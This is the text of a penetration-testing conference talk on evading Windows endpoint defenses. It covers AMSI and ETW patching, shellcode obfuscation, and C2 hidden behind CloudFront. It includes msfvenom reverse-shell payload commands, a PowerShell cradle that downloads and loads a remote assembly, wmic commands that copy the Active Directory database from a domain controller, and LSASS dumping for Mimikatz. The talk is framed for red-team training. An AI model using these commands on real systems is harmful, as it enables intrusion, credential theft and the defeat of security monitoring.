Move Aside Script

Kiddies
Malware Execution in the
Age of Advanced Defenses
Author: Joff Thyer © 2020
Black Hills Information Security
Who am I?

● Joff Thyer
○ Malware Developer, Researcher, and Pen Tester
○ Black Hills Information Security
○ SANS Certified Instructor of SEC573
○ Co-Host of Security Weekly Podcast
○ Musician, and lover of geeky things
Attacker / Threat Actor Emulation

● As penetration testers we want to emulate threat actors as

realistically as possible.
● Our goal is to demonstrate risks through the emulation of a threat
actor, and the execute of real attacks
● We also want to demonstrate real and actionable value at a
reasonable cost
Attacker / Threat Actor Emulation

● Defenders love tuning their skills, tools, tactics, and

procedures.
● Cooperative or competitive?
○ Competitive is normally presented as a “Red Teaming” exercise
■ Longer in duration (more expensive) than most engagements
■ Not limited to virtual domain.
○ Cooperative is presented as “Purple Teaming”, or “Assumed
Compromise” testing.
■ Scoped “insider threat” exercise.
■ Leverage real world tactics to gain privilege, laterally move, access sensitive
data
Assumed Compromise

● Position the pen tester on a workstation asset within the

organization in the role of an ordinary employee
○ Most organizations are using Windows 10 endpoints as the primary
business desktop
● Have the pen tester work towards achieving privilege escalation,
lateral movement, and sensitive data access
● Communicate openly and cooperatively with defense team with
respect to TTPs.
Mitre Att&ck Matrix

● The Mitre Att&ck Matrix is fabulous work and fast becoming a

standard.
○ It is a taxonomy from an adversarial point of view
○ It describes how threat actors/adversaries:
■ Penetrate networks
■ Escalate Privileges
■ Move Laterally
■ Evade defenses
○ All organized into categorized tactics!
Endpoint Defense Maturity

● Many things have changed over the last few years

○ Security Defense Vendors have upped the game
○ New paradigms, and technologies:
■ Proactive Threat Hunting (Hunt Teaming) Emerged
■ User Behavior Analytics Products Emerged
■ Endpoint Detection and Response Products Emerged
■ Network Instrumentation and Detection Improved
■ More and more environments implemented app whitelisting
Attack Surface Changes

● Microsoft Windows 10 is better secured than prior releases

○ Windows Defender has improved considerably since its inception
■ Application guard
■ Credential guard
○ PowerShell has well instrumented logging capabilities
■ Transcription, script block, and module logging
■ Constrained Language Mode
○ AMSI to help defend against scripting language exploitation
○ Event Tracing being leveraged by Defensive Solutions
More Capable Organizations

● Those with dedicated security operations budget and resources are

leveraging the best of breed defense technologies available
● It is not uncommon to encounter environments that have
implemented:
○ Strong and Manually Tuned Antivirus Solutions
○ Carbon Black / Bit9 or Applocker whitelisting
○ Solutions like Cylance, Sentinel One, or Crowd Strike (Falcon)
C2 Implant Execution

● Consider an environment whereby:

○ Unsigned EXE files will not run
○ Visual Basic Script will not run (CSCRIPT and WSCRIPT denied)
○ PowerShell is heavily tracked
○ Endpoint is forwarding event information
○ Defense solutions using Windows Event Tracing
○ Egress traffic is filtered
○ The only Internet comms are via a web proxy
Metasploit

● Metasploit’s Meterpreter is an amazingly useful environment as a

C2 channel. Many payload options:
○ reverse_https
○ reverse_tcp
● The “msfvenom” command still offers us a lot of flexibility
○ Output executable formats include:
■ Exe, dll, powershell, jar, HTA, vbs, war etc..
○ Transform output formats are very useful to incorporate into other tooling
■ Raw binary machine code
■ C#, C, Java, Python, Ruby ← different byte arrays
● Defense vendors universally have signatures for most if not ALL
metasploit machine code.
Why wont my EXE run?

● Metasploit - templates are use if you don’t specify one yourself.

● The shellcode gets “stuffed” into a new randomly named PE/COFF
segment.
○ Note: You can have the shellcode replace .text segment with “exe-only”
Sign your binary!
● If you obtain a code signing certificate, it will help you in a non app
whitelisting environment.
● If using Cobalt Strike, consider configuring this into malleable C2
profile.
Metasploit: Why is my network traffic
caught?

● Stage 1:
○ If you use a Metasploit reverse_https for example, then the initial
certificate exchange will be stopped.
○ Unless… you use your own domain and your own legit signed certificate
○ Let’s say thanks to LetsEncrypt one more time here….
● Stage 2:
○ Unless you encode it AND you are using a server side certificate with
domain, then second stage will ALWAYS be busted.
○ Multi/handler:
■ set StageEncoder x64/zutto_dekiro
■ set EnableStageEncoding true
Metasploit encode/encrypt
● Encoders are not bad with msfvenom.
○ Encoders have specific machine code routines that still have to run to
“decode” and write results back to memory segment when code resides.
○ Memory segment must be RWX permissions to allow decode to occur.
● Encryption algorithms are available in msfvenom also.
● My personal rules
○ Leverage the msfvenom “transform” formats and do your own custom
encoding of the shellcode in another language.
○ Do NOT use second stage payloads but rather “single” stage.
○ Stick with 64-bit these days.
○ Customize to live off the land.
C2 - Customize and LOL
● You can execute shellcode from many different programming or
scripting languages.
● The outline/sequence for execution is universally the same whether
in a local process or targeting a remote process
○ Create a memory buffer
○ Copy shellcode to that buffer
○ Create a thread or a process that points to that buffer.
● Living off the land binaries and scripts (LOLBAS) directly help with
app whitelisting
● But can also help with A/V and EDR evasion.
C2 - Shellcode Obfuscation

● The goal here is to ensure that the shellcode does not exist in the
delivery cradle (program) in its original form
○ Why? Because A/V solutions will immediately trigger
● There are MANY possibilities here to customize/obfuscate
○ Encrypt / Decrypt (simple XOR is ok!)
○ Encode (base64 or other base-N) / Decode
○ Compress / Uncompress
● For symmetric encryption/decryption we require a key.
○ Fixed value in source code
○ Other easy to retrieve value across Internet. (unlimited possibilities)
C2 - Defense Evasion

● Living off the land with .NET

○ With a little bit of programming you can use these:
■ Installutil.exe
■ Msbuild.exe
■ Csc.exe
■ Regasm.exe
■ Regsvr32.exe
■ MSHTA
● Without .NET
○ Rundll32.exe and commodity malware frameworks
■ Ie: DLL payload with Metasploit
○ Create a DLL shellcode delivery mechanism in C/C++
with MFC API.
● Living of the techniques are being watched also.
C2 - Defense Evasion

● My favorite is to leverage AWS CloudFront

● Many potential choices for a HTTPS/TLS C2 channel
○ http://ask.thec2matrix.com/
○ Thank you Jorge Orchilles!
● Create a cloudfront distribution. Use the cloudfront TLS certificate
○ Send the “origin” traffic back to your C2 infrastructure.
○ You don’t even have to use “domain fronting”.
○ Note: be careful when setting caching options
■ Trick is to “forward all” and send all HTTP verbs/methods
C2 - Defense Evasion

● Don’t use a “staged” payload

● The second stage will just get busted coming across the network
○ Downside is larger shellcode size.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999

$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=9999

No Second
Stage!
Example: C# Shellcode Exec

This uses function pointer

delegation method.

Assumes shellcode
is base64 encoded.

After we get the delegated function

pointer, we just call it!
Did you know?

● You can load a .NET Assembly directly in PowerShell

● You could use a “downgrade” attack with the bytes from a .NET
assembly.
● Cradle might look like this:

PS C:\> $w = new-object system.net.webclient

PS C:\> $p = $w.downloaddata(“https://mydomain.com/dllfile”)
PS C:\> [system.reflection.assembly]::Load($p)
PS C:\> $a = new-object namespace.class
PS C:\> $a.Method()
.NET (MSIL) is Reversible

● Decompilers include
○ Jetbrains DotPeek
○ Telerik JustDecompile
● Use a source protector to avoid reversing. (ConfuserEX)
Recon/Discovery Artifacts

● If you have to write things to disk….

○ I like using C:\users\public (with a twist)
○ Lots of domains have internal PKI deployed
○ Don’t make it too easy, just encrypt your files! :)

“E” means
encrypted
AntiMalware Scan Interface
● AMSI can be annoying
● .NET 4.8 has AMSI when loading Assemblies.
● PowerShell Version 2.0 does not have AMSI (Downgrade)
AMSI is a response to “fileless” threats

● What do I mean by that?

● Well nothing is truly fileless so the term is used very broadly
● But… the Microsoft scripting engines are an attractive way to get malware to
run
○ JScript → HTML Application based malware
○ PowerShell → often using “IEX” and base64 encoded script blocks
○ Visual Basic in Office Macros
○ Visual Basic Scripting (wscript.exe / cscript.exe)
● Its really about non-EXE based attacks, and not necessarily software
vulnerability centric.
AMSI Amusement
Fame! … well not quite
Keep it Simple!

● https://github.com/yoda66/PowerStrip
○ All it does is remove comments from scripts.
AMSI Bypass

● You can load “amsi.dll” and patch it at runtime.

● Very useful if you intend to use .NET “LoadAssembly()”
● One method involves patching machine code in the
“AmsiScanBuffer()” function.
○ Change the EDI/RDI register to have a zero in it at offset 0x1b of the
machine code.
○ Tricks the AMSIScanBuffer function to thinking that the byte sequence is
ZERO length.
● https://www.cyberark.com/resources/threat-research-blog/amsi-by
pass-redux
AMSI Bypass Example

The code calls the AMSI bypass function if

there is a second argument provided.
Event Tracing Bypass

● A lot of EDR solutions take advantage of Windows Event Tracing to

understand what is happening
● Event tracing will end up using the “EtwEventWrite()” function in
NTDLL.DLL
○ The normal function completes with a Return 0x14 call. (RET 14H)
● If we write the same machine code at the beginning of the
“EtwEventWrite()” function….
○ >>> No events logged now! :) <<<
○ Or create bogus events for fun and profit
● https://blog.xpnsec.com/hiding-your-dotnet-etw/
Combination Approaches

● Bypassing AMSI, and ETW for example are reasonably simple to

implement in C#
● Suggest you author your initial implants to leverage these
techniques along with shellcode execution
● Such techniques can also be incorporated into post exploitation
activities.
Lateral Movement
● Why PSEXEC when you can RDP or WMI?
● When hunting for credentials, RDP to target, then
● Use task manager to right click LSASS.exe and create
mini memory dump file
○ Copy back to home system, download and run Mimikatz
OFFLINE!
Lateral Movement

● WMIC is incredibly useful

● You have a domain admin account
● Want a full copy of AD from Domain Controller at
10.10.10.10?
○ Open local CMD.EXE as Domain Admin User (runas)
● Want to run an installutil command to pivot?

C:\> mkdir \\10.10.10.10\c$\temp\ad

C:\> wmic /node:10.10.10.10 process call create “cmd.exe /c ntdsutil \”ac in ntds\” ifm
\”cr fu c:\temp\ad\” q q”

C:\> wmic /node:10.10.10.10 process call create “cmd.exe /c

\windows\microsoft.net\framework64\v4.0.30319\installutil.exe /logfile= /u \temp\file.dll”
In Conclusion...
● If you have the context of deployed EDR / Whitelisting / Advanced
Endpoint Defenses
● Then…
○ Keep actual endpoint software execution to a minimum.
○ Establish your C2 channels with NO second stage payload. (stageless)
○ Use real domains with real certificates when transporting over HTTPS
○ Leverage defense evasion such as AMSI bypass / ETW disable!
○ Obfuscate your own CUSTOM .NET assemblies
○ Sign binaries
○ Leverage proxies where possible. (socks4 and http)
○ Leverage intermediaries (like CloudFront) to hide your C2 traffic
Want to know more?

● Learn implant architecture with a custom C2 Framework

○ Embed Shellcode in C#, Python, and GOLang
○ Direction shellcode execution versus process injection.
○ Evasion Technique discussions

● Register here: https://bit.ly/JoffsC2Class

○ 4 Sessions of 4 Hours Starting January 19, 2021

● https://wildwesthackinfest.com/training/enterprise-attacker-emula
tion-and-c2-implant-development-w-joff-thyer/
Questions / Comments?